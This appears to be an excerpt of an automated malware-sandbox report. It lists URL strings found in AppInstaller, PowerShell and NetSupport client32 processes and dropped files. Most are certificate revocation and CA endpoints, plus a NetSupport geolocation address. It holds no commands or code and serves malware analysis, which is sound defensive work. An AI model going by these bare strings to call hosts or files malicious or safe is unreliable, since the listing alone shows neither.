Source: AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1681976342.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767561183.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr	String found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0P
Source: powershell.exe, 0000001A.00000002.1968531120.00000231633D6000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.26.dr	String found in binary or memory: http://crl.globalsign.com/gs/gscodesignsha2g2.crl0
Source: AppInstaller.exe, 0000000E.00000002.1767669813.00000196D5373000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2589315974.000002A99F31F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E9000.00000004.00000020.00020000.00000000.sdmp, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0#
Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0N
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000001A.00000002.1968531120.00000231633D6000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.26.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.postsignum.cz/crl/psrootqca4.crl02
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.postsignum.eu/crl/psrootqca4.crl0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: AppInstaller.exe, 0000000E.00000002.1776167790.00000196D5FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, TCCTL32.DLL.26.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl2.postsignum.cz/crl/psrootqca4.crl01
Source: AppInstaller.exe, 0000000E.00000002.1767669813.00000196D5373000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680617833.00000196D5F42000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
Source: client32.exe, client32.exe, 00000020.00000003.1940686628.00000000008EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2542110346.0000000005AA0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, client32.exe, 00000020.00000003.1941988586.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.1940878596.00000000008FD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.1942600345.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2520445291.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2537133329.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2543509132.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2544309699.0000000005AE4000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.26.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: client32.exe, 00000020.00000002.2540155172.0000000005A6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspBranchCache
Source: client32.exe, 00000020.00000002.2520445291.00000000008E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspConnected
Source: client32.exe, 00000020.00000002.2544309699.0000000005AE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspCoreNet-Diag-ICMP6-EchoRequest-Out-NoScopeLMEMX
Source: client32.exe, 00000020.00000002.2540155172.0000000005A6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspMicrosoft-Windows-PeerDist-HostedClient-OutLMEMX
Source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: client32.exe, 00000020.00000002.2542110346.0000000005AA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspuest-Out-NoScope
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
Source: powershell.exe, 00000017.00000002.2398750900.000001E12D1B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2180463385.000001E11EA2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2398750900.000001E12D07C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2037069987.000002B2900A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2149775477.00000231711D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es0
Source: AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1681976342.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767561183.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: AppInstaller.exe, 0000000E.00000002.1767669813.00000196D5373000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2589315974.000002A99F31F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E9000.00000004.00000020.00020000.00000000.sdmp, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.ncdc.gov.sa0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.pki.gva.es0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.suscerte.gob.ve0
Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, TCCTL32.DLL.26.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 0000001A.00000002.1968531120.00000231633D6000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.26.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g20
Source: powershell.exe, 00000019.00000002.1941634656.000002B2801BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png8
Source: AppInstaller.exe, 0000000E.00000003.1680617833.00000196D5F42000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pki.digidentity.eu/validatie0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pki.registradores.org/normativa/index.htm0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://policy.camerfirma.com0
Source: AppInstaller.exe, 0000000E.00000003.1680507889.00000196D5F68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680011147.00000196D5F73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.dr	String found in binary or memory: http://s2.symcb.com0
Source: AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micros
Source: AppInstaller.exe, 0000000E.00000002.1763243158.00000196CDBEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft
Source: powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023161B2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000017.00000002.2180463385.000001E11D001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1941634656.000002B280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023161161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2535977313.000002678C697000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023161B2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1681976342.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767561183.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt0
Source: powershell.exe, 0000001A.00000002.1968531120.00000231633D6000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.26.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g2.crt08
Source: AppInstaller.exe, 0000000E.00000002.1767669813.00000196D5373000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2589315974.000002A99F31F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E9000.00000004.00000020.00020000.00000000.sdmp, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr	String found in binary or memory: http://secure.globalsign.net/cacert/ObjectSign.crt09
Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr	String found in binary or memory: http://secure.globalsign.net/cacert/PrimObject.crt0
Source: AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr	String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr	String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr	String found in binary or memory: http://sf.symcd.com0&
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.dr	String found in binary or memory: http://sv.symcd.com0&
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, TCCTL32.DLL.26.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, TCCTL32.DLL.26.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, TCCTL32.DLL.26.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
Source: AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.acabogacia.org/doc0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.acabogacia.org0
Source: AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es00
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
